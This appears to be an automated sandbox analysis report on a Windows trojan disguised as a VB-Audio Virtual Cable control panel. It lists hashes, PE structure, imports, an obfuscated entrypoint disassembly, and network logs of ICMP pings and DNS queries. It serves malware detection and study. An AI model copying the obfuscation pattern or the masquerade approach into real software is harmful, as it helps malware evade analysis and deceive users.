File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.866429705903183
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File size:	4255416
MD5:	29389832e538957dc769cf709f80144a
SHA1:	72f5ca06d840acbc9b49e4096e341c0dbaac891e
SHA256:	d6d2e00343a3cad48cc2f4799ce87d27acc3ce154aed286c07f226de2e9c4035
SHA512:	5f787359fbc37d8bed92da38e80106cc257c2339488ca956759b33024aa61194bb87faa8db841ded486d5bba253ce44342dd206cf93a9751de95784f5ee79f05
SSDEEP:	98304:EoT9sIWSFT79YBDTzRHjEREGL1d2YuVNR:RCIW6790vlHjEREGLK3bR
File Content Preview:	MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V...........................

File Icon


Icon Hash:	b595139bec4252a9

Static PE Info

General
Entrypoint:	0x403bc3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x56250B1B [Mon Oct 19 15:24:11 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3a057d8e2436bad9e0ae8c20a8d4d334

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 00403BC3h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007FF8FC80A66Dh
mov esi, edi
mov edx, edi
mov edx, dword ptr [edi]
mov eax, dword ptr [esi]
push eax
call edx
popad
push 00000003h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007FF8FC80A672h
mov eax, ebp
mov ebx, ecx
mov eax, ecx
mov eax, dword ptr [esi]
idiv eax
mov esp, ecx
add ebx, eax
mov esp, esi
popad
mov eax, 00403F45h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007FF8FC80A66Fh
pop edx
mov ecx, esi
mov edx, edi
mov ecx, dword ptr [ebp+00h]
mov esp, ebx
mov ebx, dword ptr [ebx]
pop ecx
popad
push eax
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007FF8FC80A66Eh
mov ebp, esi
mov ebx, dword ptr [esi]
inc edx
mov ebx, esp
imul eax, edx
mov ecx, eax
popad
push 000013C5h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007FF8FC80A672h
mov edi, eax
dec edx
mov ebx, esi
call edi
mov edi, ecx
dec ebx
push ebx
test eax, eax
call edi
pop ecx
popad
push 00404779h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007FF8FC80A66Bh

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804
[ C ] VS98 (6.0) SP6 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb8f0	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xc0540	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd2000	0x1eb8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x1c4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9276	0xa000	False	0.55888671875	data	6.56023629969	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x12dc	0x2000	False	0.28466796875	data	3.67874100082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xd000	0x4ea4	0x4000	False	0.1611328125	data	1.88336858311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xc0540	0xc1000	False	0.292934595612	data	5.9441633332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x121e0	0xbf518	data	French	France
RT_ICON	0xd16f8	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4279173368, next used block 2163736576	French	France
RT_MENU	0xd19e0	0x3d4	data	French	France
RT_GROUP_ICON	0xd1db8	0x14	data	French	France
RT_VERSION	0xd1dd0	0x3c0	data	French	France
RT_MANIFEST	0xd2190	0x3ac	XML 1.0 document, ASCII text	French	France

Imports

DLL	Import
KERNEL32.dll	FlushFileBuffers, GetStringTypeW, GetStringTypeA, SetStdHandle, LoadLibraryA, GetOEMCP, GetACP, LCMapStringW, MultiByteToWideChar, GetCPInfo, SetFilePointer, WriteFile, TlsGetValue, SetLastError, DeviceIoControl, GetTickCount, CreateFileA, GetLastError, CreateMutexA, ReleaseMutex, WaitForSingleObject, CloseHandle, GetModuleHandleA, GetProcAddress, GetCurrentProcess, LCMapStringA, GetVersionExA, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, HeapFree, HeapAlloc, HeapReAlloc, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, InterlockedIncrement, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount
USER32.dll	GetMessageA, DispatchMessageA, TranslateMessage, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetSystemMetrics, SetWindowPos, SetTimer, BeginPaint, EndPaint, KillTimer, PostQuitMessage, GetDC, ReleaseDC, DefWindowProcA, MessageBoxA, DrawTextA, LoadBitmapA, PostMessageA, SystemParametersInfoA
GDI32.dll	SetBkMode, SetTextColor, Rectangle, CreateCompatibleDC, SelectObject, GetObjectA, BitBlt, DeleteDC, DeleteObject, CreateFontIndirectA, CreateBrushIndirect, GetStockObject
ADVAPI32.dll	RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegCreateKeyA, RegSetValueExA, RegCloseKey
SHELL32.dll	ShellExecuteA
SETUPAPI.dll	SetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiDestroyDeviceInfoList

Version Infos

Description	Data
LegalCopyright	V.Burel2012-2015
InternalName	VBCABLE_ControlPanel
FileVersion	1, 0, 3, 5
CompanyName	VB-AUDIO Software
Comments	VB-AUDIO Control Panel forVB-Audio Virtual Cable
ProductName	VBCABLE_ControlPanel
ProductVersion	1, 0, 3, 5
FileDescription	VB-AUDIO Virtual Cable Control Panel
OriginalFilename	VBCABLE_ControlPanel.exe
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
French	France

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
04/12/21-13:03:00.758135	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.793076	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
04/12/21-13:03:00.794144	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.829208	ICMP	449	ICMP Time-To-Live Exceeded in Transit	5.56.20.161	192.168.2.6
04/12/21-13:03:00.829596	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.877257	ICMP	449	ICMP Time-To-Live Exceeded in Transit	81.95.2.138	192.168.2.6
04/12/21-13:03:00.878848	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.931631	ICMP	449	ICMP Time-To-Live Exceeded in Transit	151.139.80.6	192.168.2.6
04/12/21-13:03:00.932046	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.981732	ICMP	449	ICMP Time-To-Live Exceeded in Transit	151.139.80.13	192.168.2.6
04/12/21-13:03:00.982232	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:01.032005	ICMP	408	ICMP Echo Reply	205.185.216.42	192.168.2.6

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 13:15:05.028171062 CEST	55074	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:05.087340117 CEST	53	55074	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:06.949780941 CEST	54513	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:07.001149893 CEST	53	54513	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:08.090236902 CEST	62044	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:08.246315002 CEST	63791	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:08.247900009 CEST	53	62044	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:08.294984102 CEST	53	63791	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:10.375719070 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:10.425357103 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:14.377513885 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:14.437091112 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:14.450926065 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:14.511521101 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:14.525068045 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:14.575675964 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:14.589874983 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:14.649498940 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:14.660587072 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:14.808012009 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:14.815713882 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:14.890281916 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:14.902801037 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.073606968 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.091698885 CEST	56061	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.151166916 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.159184933 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.304997921 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.324261904 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.382364988 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.391724110 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.451457024 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.471811056 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.546252012 CEST	53	52811	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.556051970 CEST	55299	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.609122038 CEST	63745	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.616929054 CEST	53	55299	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.624927044 CEST	50055	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.658047915 CEST	53	63745	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.684731960 CEST	53	50055	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.883393049 CEST	61374	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:15.943239927 CEST	53	61374	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:15.950357914 CEST	50339	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:16.001530886 CEST	53	50339	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:16.007472992 CEST	63307	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:16.056565046 CEST	53	63307	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:16.063611984 CEST	49694	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:16.112196922 CEST	53	49694	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:16.126163960 CEST	54982	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:16.185563087 CEST	53	54982	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:16.201939106 CEST	50010	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:16.279423952 CEST	53	50010	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:16.286492109 CEST	63718	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:16.344163895 CEST	53	63718	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:17.282327890 CEST	62116	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:17.336230993 CEST	53	62116	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:18.326478958 CEST	63816	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:18.375329018 CEST	53	63816	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:18.495150089 CEST	55014	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:18.556648970 CEST	53	55014	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:18.618143082 CEST	62208	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:18.669631958 CEST	53	62208	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:18.758435011 CEST	57574	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:18.834914923 CEST	53	57574	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:19.040222883 CEST	51818	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:19.089245081 CEST	53	51818	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:19.308532953 CEST	56628	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:19.369549036 CEST	53	56628	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:19.448554993 CEST	60778	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:19.508394003 CEST	53	60778	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:19.650157928 CEST	53799	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:19.710432053 CEST	53	53799	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:22.529341936 CEST	54683	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:22.590101004 CEST	53	54683	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:22.612606049 CEST	59329	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:22.661261082 CEST	53	59329	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:22.669120073 CEST	64021	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:22.720638037 CEST	53	64021	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:22.733589888 CEST	56129	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:22.793107033 CEST	53	56129	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:22.801429033 CEST	58177	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:22.860833883 CEST	53	58177	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:22.869898081 CEST	50700	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:22.878962994 CEST	54069	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:22.927268982 CEST	53	50700	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:22.927551985 CEST	53	54069	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:22.937189102 CEST	61178	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:22.996838093 CEST	53	61178	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:23.574523926 CEST	57017	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:23.647490025 CEST	53	57017	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:23.662971973 CEST	56327	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:23.720684052 CEST	53	56327	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:23.744008064 CEST	50243	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:23.801461935 CEST	53	50243	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:23.961246014 CEST	62055	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:24.018718958 CEST	53	62055	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:24.082461119 CEST	61249	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:24.132764101 CEST	53	61249	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:24.139319897 CEST	65252	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:24.168020010 CEST	64367	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:24.187997103 CEST	53	65252	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:24.194757938 CEST	55066	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:24.228027105 CEST	53	64367	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:24.256973028 CEST	53	55066	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:27.193100929 CEST	60211	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:27.250489950 CEST	53	60211	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:27.258804083 CEST	56570	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:27.316061974 CEST	53	56570	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:27.322952986 CEST	58454	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:27.383675098 CEST	53	58454	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:27.415589094 CEST	55180	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:27.476651907 CEST	53	55180	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:27.495362997 CEST	58721	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:27.555502892 CEST	53	58721	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:27.563915014 CEST	57691	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:27.613778114 CEST	53	57691	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:27.622380018 CEST	52943	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:27.673024893 CEST	53	52943	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:27.795089960 CEST	59489	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:27.843745947 CEST	53	59489	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:31.500628948 CEST	64022	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:31.550905943 CEST	53	64022	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:31.558604002 CEST	60023	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:31.617341042 CEST	53	60023	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:31.632806063 CEST	57193	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:31.690270901 CEST	53	57193	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:31.696170092 CEST	50248	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:31.756274939 CEST	53	50248	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:31.764345884 CEST	64413	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:31.823908091 CEST	53	64413	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:31.838165998 CEST	60429	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:31.891380072 CEST	53	60429	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:31.979769945 CEST	60345	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:32.028791904 CEST	53	60345	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:32.055459976 CEST	58730	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:32.115395069 CEST	53	58730	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:32.129462957 CEST	53830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:32.189440966 CEST	53	53830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:32.199481964 CEST	57226	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:32.250993013 CEST	53	57226	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:32.295160055 CEST	57880	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:32.349026918 CEST	53	57880	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:32.361999035 CEST	60850	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:32.419326067 CEST	53	60850	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:32.432769060 CEST	53187	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:32.489864111 CEST	53	53187	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:32.504848957 CEST	55830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:32.553649902 CEST	53	55830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.079602957 CEST	55145	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.137182951 CEST	53	55145	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.145359993 CEST	64091	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.194175005 CEST	53	64091	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.205358028 CEST	55728	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.265013933 CEST	53	55728	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.275417089 CEST	55694	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.336049080 CEST	53	55694	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.349136114 CEST	53926	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.406616926 CEST	53	53926	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.420001984 CEST	65531	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.483098030 CEST	53	65531	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.497481108 CEST	65437	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.559887886 CEST	53	65437	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.598592997 CEST	54590	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.648308992 CEST	53	54590	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.660948038 CEST	51318	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.721612930 CEST	53	51318	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.735624075 CEST	60888	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.792784929 CEST	53	60888	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.807276011 CEST	58474	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.865225077 CEST	53	58474	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.880134106 CEST	64575	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:33.939807892 CEST	53	64575	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:33.945940018 CEST	59092	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.003313065 CEST	53	59092	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.013783932 CEST	57483	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.072362900 CEST	53	57483	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.077974081 CEST	53830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.131834984 CEST	53	53830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.165466070 CEST	49809	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.196043968 CEST	52814	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.222738981 CEST	53	49809	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.228888988 CEST	51069	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.244709015 CEST	53	52814	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.289136887 CEST	53	51069	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.298808098 CEST	56526	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.359421968 CEST	53	56526	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.371790886 CEST	50512	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.429187059 CEST	53	50512	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.455920935 CEST	51679	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.514575958 CEST	53	51679	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:34.522313118 CEST	56071	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:34.581497908 CEST	53	56071	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:38.273324013 CEST	58950	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:38.325799942 CEST	53	58950	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:44.917946100 CEST	57035	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:44.969469070 CEST	53	57035	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:45.360727072 CEST	54122	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:45.419450045 CEST	53	54122	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:51.648303032 CEST	56759	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:51.709584951 CEST	53	56759	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:51.716878891 CEST	59220	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:51.768702984 CEST	53	59220	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:51.775183916 CEST	62211	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:51.824040890 CEST	53	62211	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:51.830224037 CEST	62033	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:51.880275965 CEST	53	62033	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:51.891655922 CEST	61244	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:51.940763950 CEST	53	61244	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:51.952944040 CEST	53696	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:52.012754917 CEST	53	53696	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:52.018667936 CEST	50733	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:52.077620983 CEST	53	50733	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:57.684639931 CEST	55770	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:57.733673096 CEST	53	55770	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:57.932301044 CEST	54525	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:15:57.983031034 CEST	53	54525	8.8.8.8	192.168.2.6
Apr 12, 2021 13:15:58.108226061 CEST	61760	53	192.168.2.6	8.8.8.8
